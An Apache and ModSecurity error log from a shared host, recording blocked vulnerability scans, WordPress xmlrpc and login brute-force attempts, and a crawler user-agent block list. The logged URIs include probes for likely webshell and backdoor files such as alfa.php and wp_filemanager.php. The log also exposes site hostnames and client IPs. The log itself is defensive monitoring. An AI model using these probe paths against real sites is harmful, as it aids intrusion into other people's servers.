[Tue May 26 17:29:12.513713 2026] [security2:error] [pid 891273:tid 891470] [client 20.151.111.128:5811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWLEMDEzZ8z3jtDm82VYAAAAEM"], referer: www.google.com
[Tue May 26 17:29:13.072912 2026] [security2:error] [pid 891273:tid 891476] [client 20.151.111.128:5802] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWLEMDEzZ8z3jtDm82VXwAAAEk"], referer: www.google.com
[Tue May 26 17:29:13.441659 2026] [security2:error] [pid 891273:tid 891510] [client 20.151.111.128:5802] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWLEcDEzZ8z3jtDm82VcQAAAGs"], referer: www.google.com
[Tue May 26 17:29:13.584259 2026] [core:crit] [pid 891273:tid 891478] (13)Permission denied: [client 157.55.39.194:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:29:13.589185 2026] [security2:error] [pid 891273:tid 891457] [client 20.151.111.128:5809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/miyihmcj.php"] [unique_id "ahWLEcDEzZ8z3jtDm82VfAAAADY"], referer: www.google.com
[Tue May 26 17:29:14.234731 2026] [security2:error] [pid 891273:tid 891511] [client 172.202.92.73:30161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWLEsDEzZ8z3jtDm82VjgAAAGw"]
[Tue May 26 17:29:14.234866 2026] [security2:error] [pid 891273:tid 891511] [client 172.202.92.73:30161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWLEsDEzZ8z3jtDm82VjgAAAGw"]
[Tue May 26 17:29:14.427919 2026] [security2:error] [pid 891273:tid 891447] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLEsDEzZ8z3jtDm82VhwAAACw"]
[Tue May 26 17:29:15.153309 2026] [security2:error] [pid 891273:tid 891455] [client 107.175.36.170:34708] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWLE8DEzZ8z3jtDm82VrgAAADQ"], referer: https://www.cagmedya.com/xmlrpc.php
[Tue May 26 17:29:15.885992 2026] [security2:error] [pid 891273:tid 891495] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLE8DEzZ8z3jtDm82V1wAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 17:29:15.989692 2026] [security2:error] [pid 891273:tid 891433] [client 20.151.111.128:5692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-plain.php"] [unique_id "ahWLE8DEzZ8z3jtDm82V3wAAAB4"], referer: www.google.com
[Tue May 26 17:29:16.027806 2026] [security2:error] [pid 891273:tid 891471] [client 20.151.111.128:5653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWLFMDEzZ8z3jtDm82V5wAAAEQ"], referer: www.google.com
[Tue May 26 17:29:16.083153 2026] [security2:error] [pid 891273:tid 891403] [client 172.202.92.73:37388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/admin.php"] [unique_id "ahWLFMDEzZ8z3jtDm82V6QAAAAA"]
[Tue May 26 17:29:16.083258 2026] [security2:error] [pid 891273:tid 891403] [client 172.202.92.73:37388] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/admin.php"] [unique_id "ahWLFMDEzZ8z3jtDm82V6QAAAAA"]
[Tue May 26 17:29:16.444487 2026] [security2:error] [pid 891273:tid 891458] [client 20.151.111.128:5649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWLFMDEzZ8z3jtDm82V_QAAADc"]
[Tue May 26 17:29:16.450025 2026] [security2:error] [pid 891273:tid 891474] [client 107.175.36.170:56248] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWLFMDEzZ8z3jtDm82V-QAAAEc"], referer: https://www.cagmedya.com/xmlrpc.php
[Tue May 26 17:29:16.629608 2026] [security2:error] [pid 891273:tid 891514] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLFMDEzZ8z3jtDm82WCQAAAG8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1214410&moderation-hash=b80779841d8a6ce018b0854fa86095b6
[Tue May 26 17:29:17.570404 2026] [security2:error] [pid 891273:tid 891404] [client 172.202.92.73:5307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/goods.php"] [unique_id "ahWLFcDEzZ8z3jtDm82WUAAAAAE"]
[Tue May 26 17:29:17.570499 2026] [security2:error] [pid 891273:tid 891404] [client 172.202.92.73:5307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/goods.php"] [unique_id "ahWLFcDEzZ8z3jtDm82WUAAAAAE"]
[Tue May 26 17:29:17.664509 2026] [security2:error] [pid 891273:tid 891510] [client 139.84.217.147:51108] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "enattafoodparcel.org.thedebateafrica.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWLFcDEzZ8z3jtDm82WVgAAAGs"]
[Tue May 26 17:29:18.024448 2026] [security2:error] [pid 891273:tid 891419] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLFcDEzZ8z3jtDm82WZgAAABA"], referer: https://anujtradingco.com
[Tue May 26 17:29:18.719772 2026] [security2:error] [pid 891273:tid 891469] [client 20.151.111.128:11982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWLFsDEzZ8z3jtDm82WnAAAAEI"]
[Tue May 26 17:29:18.772688 2026] [security2:error] [pid 891273:tid 891483] [client 20.151.111.128:11986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/sgoapqdu.php"] [unique_id "ahWLFsDEzZ8z3jtDm82WoAAAAFA"], referer: www.google.com
[Tue May 26 17:29:18.811771 2026] [security2:error] [pid 891273:tid 891484] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLFcDEzZ8z3jtDm82WLQAAAFE"]
[Tue May 26 17:29:19.027493 2026] [security2:error] [pid 891273:tid 891403] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLFsDEzZ8z3jtDm82WkgAAAAA"]
[Tue May 26 17:29:19.042266 2026] [security2:error] [pid 891273:tid 891407] [client 172.202.92.73:29531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/public/css.php"] [unique_id "ahWLF8DEzZ8z3jtDm82WqgAAAAQ"]
[Tue May 26 17:29:19.042371 2026] [security2:error] [pid 891273:tid 891407] [client 172.202.92.73:29531] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/public/css.php"] [unique_id "ahWLF8DEzZ8z3jtDm82WqgAAAAQ"]
[Tue May 26 17:29:19.465995 2026] [core:crit] [pid 891273:tid 891425] (13)Permission denied: [client 40.77.167.17:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:29:19.928653 2026] [security2:error] [pid 891273:tid 891477] [client 185.191.171.11:15700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWLF8DEzZ8z3jtDm82W4QAAAEo"]
[Tue May 26 17:29:19.928860 2026] [security2:error] [pid 891273:tid 891477] [client 185.191.171.11:15700] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWLF8DEzZ8z3jtDm82W4QAAAEo"]
[Tue May 26 17:29:21.330606 2026] [security2:error] [pid 891273:tid 891425] [client 203.194.101.7:64238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLGcDEzZ8z3jtDm82XLwAAABY"]
[Tue May 26 17:29:21.331651 2026] [security2:error] [pid 891273:tid 891425] [client 203.194.101.7:64238] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLGcDEzZ8z3jtDm82XLwAAABY"]
[Tue May 26 17:29:21.361269 2026] [security2:error] [pid 891273:tid 891412] [client 172.202.92.73:37431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/alfa.php"] [unique_id "ahWLGcDEzZ8z3jtDm82XMgAAAAk"]
[Tue May 26 17:29:21.361411 2026] [security2:error] [pid 891273:tid 891412] [client 172.202.92.73:37431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/alfa.php"] [unique_id "ahWLGcDEzZ8z3jtDm82XMgAAAAk"]
[Tue May 26 17:29:21.414091 2026] [security2:error] [pid 891273:tid 891422] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLGMDEzZ8z3jtDm82XHQAAABM"]
[Tue May 26 17:29:21.657469 2026] [security2:error] [pid 891273:tid 891403] [client 20.151.111.128:12025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWLGcDEzZ8z3jtDm82XRQAAAAA"]
[Tue May 26 17:29:21.850253 2026] [security2:error] [pid 891273:tid 891407] [client 223.235.98.214:10981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLGcDEzZ8z3jtDm82XTwAAAAQ"]
[Tue May 26 17:29:21.850418 2026] [security2:error] [pid 891273:tid 891407] [client 223.235.98.214:10981] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLGcDEzZ8z3jtDm82XTwAAAAQ"]
[Tue May 26 17:29:22.756243 2026] [security2:error] [pid 891273:tid 891441] [client 107.175.36.170:43481] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-admin/post-new.php"] [unique_id "ahWLGsDEzZ8z3jtDm82XfQAAACY"], referer: https://www.cagmedya.com/
[Tue May 26 17:29:23.663057 2026] [security2:error] [pid 891273:tid 891449] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLG8DEzZ8z3jtDm82XkwAAAC4"]
[Tue May 26 17:29:23.676494 2026] [security2:error] [pid 891273:tid 891424] [client 172.202.92.73:37421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/css.php"] [unique_id "ahWLG8DEzZ8z3jtDm82XowAAABU"]
[Tue May 26 17:29:23.676652 2026] [security2:error] [pid 891273:tid 891424] [client 172.202.92.73:37421] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/css.php"] [unique_id "ahWLG8DEzZ8z3jtDm82XowAAABU"]
[Tue May 26 17:29:23.989785 2026] [proxy:error] [pid 891273:tid 891412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:29:23.989841 2026] [proxy_http:error] [pid 891273:tid 891412] [client 144.126.203.197:40596] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:29:23.990484 2026] [proxy:error] [pid 891273:tid 891412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:29:23.990526 2026] [proxy_http:error] [pid 891273:tid 891412] [client 144.126.203.197:40596] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:29:24.275260 2026] [proxy:error] [pid 891273:tid 891420] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:29:24.275339 2026] [proxy_http:error] [pid 891273:tid 891420] [client 144.126.203.197:40606] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.moes-art.com/
[Tue May 26 17:29:24.275953 2026] [proxy:error] [pid 891273:tid 891420] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:29:24.275990 2026] [proxy_http:error] [pid 891273:tid 891420] [client 144.126.203.197:40606] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.moes-art.com/
[Tue May 26 17:29:24.290713 2026] [security2:error] [pid 891273:tid 891468] [client 20.151.111.128:12007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWLHMDEzZ8z3jtDm82XtgAAAEE"]
[Tue May 26 17:29:24.867040 2026] [core:error] [pid 891273:tid 891419] [client 144.126.203.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:29:24.867062 2026] [core:error] [pid 891273:tid 891419] [client 144.126.203.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:29:25.537232 2026] [security2:error] [pid 891273:tid 891415] [client 114.119.136.86:25283] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.masonicarkfoundation.in"] [uri "/maf-objectives.htm"] [unique_id "ahWLHcDEzZ8z3jtDm82XzwAAAAw"], referer: http://www.masonicarkfoundation.in/
[Tue May 26 17:29:26.246667 2026] [security2:error] [pid 891273:tid 891524] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLHcDEzZ8z3jtDm82X2wAAAHk"]
[Tue May 26 17:29:26.442980 2026] [security2:error] [pid 891273:tid 891383] [remote 54.36.102.244:35300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWLHsDEzZ8z3jtDm82X6gAAQW0"]
[Tue May 26 17:29:26.496534 2026] [security2:error] [pid 891273:tid 891276] [remote 3.208.180.187:48448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLHsDEzZ8z3jtDm82X6AAARQI"]
[Tue May 26 17:29:26.570661 2026] [security2:error] [pid 891273:tid 891452] [client 172.202.92.73:32074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/classwithtostring.php"] [unique_id "ahWLHsDEzZ8z3jtDm82X7gAAADE"]
[Tue May 26 17:29:26.570779 2026] [security2:error] [pid 891273:tid 891452] [client 172.202.92.73:32074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/classwithtostring.php"] [unique_id "ahWLHsDEzZ8z3jtDm82X7gAAADE"]
[Tue May 26 17:29:27.851416 2026] [security2:error] [pid 891273:tid 891457] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLH8DEzZ8z3jtDm82YBAAAADY"]
[Tue May 26 17:29:27.984379 2026] [autoindex:error] [pid 891273:tid 891456] [client 43.155.140.157:48146] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:29:28.341878 2026] [core:error] [pid 891273:tid 891478] [client 144.126.203.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpcontacts.moes-art.com/
[Tue May 26 17:29:28.341908 2026] [core:error] [pid 891273:tid 891478] [client 144.126.203.197:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://cpcontacts.moes-art.com/
[Tue May 26 17:29:28.934271 2026] [security2:error] [pid 891273:tid 891518] [client 64.233.173.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWLIMDEzZ8z3jtDm82YKAAAAHM"]
[Tue May 26 17:29:30.175008 2026] [security2:error] [pid 891273:tid 891437] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLIcDEzZ8z3jtDm82YZgAAACI"]
[Tue May 26 17:29:30.451170 2026] [security2:error] [pid 891273:tid 891416] [client 172.202.92.73:32116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consola.co"] [uri "/aa.php"] [unique_id "ahWLIsDEzZ8z3jtDm82YhwAAAA0"]
[Tue May 26 17:29:30.451272 2026] [security2:error] [pid 891273:tid 891416] [client 172.202.92.73:32116] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.consola.co"] [uri "/aa.php"] [unique_id "ahWLIsDEzZ8z3jtDm82YhwAAAA0"]
[Tue May 26 17:29:30.908868 2026] [security2:error] [pid 891273:tid 891312] [remote 216.73.217.110:49940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahWLIsDEzZ8z3jtDm82YmwAARCY"]
[Tue May 26 17:29:31.714669 2026] [security2:error] [pid 891273:tid 891463] [client 203.194.101.7:64576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLI8DEzZ8z3jtDm82Y0gAAADw"]
